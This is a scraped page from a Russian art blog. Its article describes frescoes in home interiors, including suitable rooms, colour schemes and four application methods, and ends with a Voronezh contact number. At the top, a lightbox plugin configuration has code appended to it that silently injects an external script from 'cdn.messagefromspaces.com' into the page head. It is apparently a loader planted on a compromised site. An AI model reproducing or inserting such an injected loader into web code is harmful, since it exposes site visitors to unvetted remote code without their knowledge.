, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Фрески в интерьере

Автор: Дмитрий Алмазов | 18 Фев 2014

Фрески в интерьереВ российских, городских квартирах  фрески полностью отсутствуют. Ведь многие не  хотят тратить деньги на столь дорогой вид украшения собственного дома. Зато в загородных домах фрески не только приветствуются, но и активно используются. Они очень актуальные для жителей коттеджных поселков. Давайте познакомимся с фресками в домах поближе.

Во-первых, отправимся в столовую. Обычно столовые выполняются в античном стиле с ярко-лазурными цветами. Фрески в интерьере располагают на противоположной стене по отношению к двери. Сначала краска наносится одним единым полотном, а потом расписываются мелкие и сложные детали. Также в столовой фрески могут размещать рядом с табльдотом. Тогда цветовая гамма фрески будет выполняться в цвет дерева, которое было использовано для изготовления табльдота.

Фрески в интерьереВо-вторых, фрески располагаются в зале. Для зала обычно задействуют две противоположные стены, которые выполняется стилизованным ансамблем. Зальные фрески выполняются в стиле модерна или античности. Если выбран модерн, то во фресках преобладают безумные линии красных, черных, темно-синих, пурпурных цветов. Если античный стиль, то царствует лазурный, белый, золотой и бежевый цвет.
Также излюбленным приемом дизайнеров является декорирование одной стены, рядом с которой стоит софа. Над софой художники любят использовать стиль импрессионизм: большими мазками изображаются букеты роз, ирисов, пионов. Цветовая гамма флёров самая разнообразная: глубокий синий, яркий оранжевый, сочный зеленый, приятный розовый.

В-третьих, перенесемся в холл. Холл - место соединения столовой и зала. Он выполняется в нейтральном стиле. Часто холл выполняется в неаполитанском стиле. Цвета подбираются в соответствии с остальным комнатами.

Сейчас существует много видов нанесения фресок: классическая (на штукатурке), на холсте, на жесткой основе, на самоклеющейся основе. Я вас познакомлю с каждым из этих видов.

Первый вид – классический. Весь процесс производится, как в старые - добрые времена. На сырую штукатурку наносят краски. Правда сейчас используются специальные эластичные краски, которые выдержат экстремальные  условия: ультрафиолет и воду.

Фрески в интерьереВторой вид – холст. Данный вид фресок является полностью ручной работой. Сначала на стене появляется основа, состоящая из штукатурки, песка и клея, потом переносят на холст уже готовую картину. После перенесения на холст, полотно обрабатывают смесью, которая состаривает холст. Таким искусственным, но современном способом, можно получить фреску в своем доме.

Третий вид – жесткая основа. В этом случае фрески наносятся на легкий слой клея. На стену накладывают монтажный клей,  а после прилепляют готовую фреску, которая уже искусственно состарена. Этот способ  создания фресок является самым бюджетным.

Четвертый вид – самоклеющаяся основа. Этот способ довольно легкий, но при этом весьма дорогостоящий. Сначала вы заказываете дизайн фрески в художественной мастерской, где вам выполнят ее на специальной клейкой основе. После получение фрески, вы сможете  наклеить фреску на стену. Для этого лишь потребуется снять защитную пленку.

Я вас познакомил с фресками в интерьере. В следующий раз я вам расскажу о венецианских фресках.

Заказать услугу в Воронеже Вы можете на странице контакты или по телефону 8(960)134-46-27.

Темы: Интерьер, картины для интерьера, о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress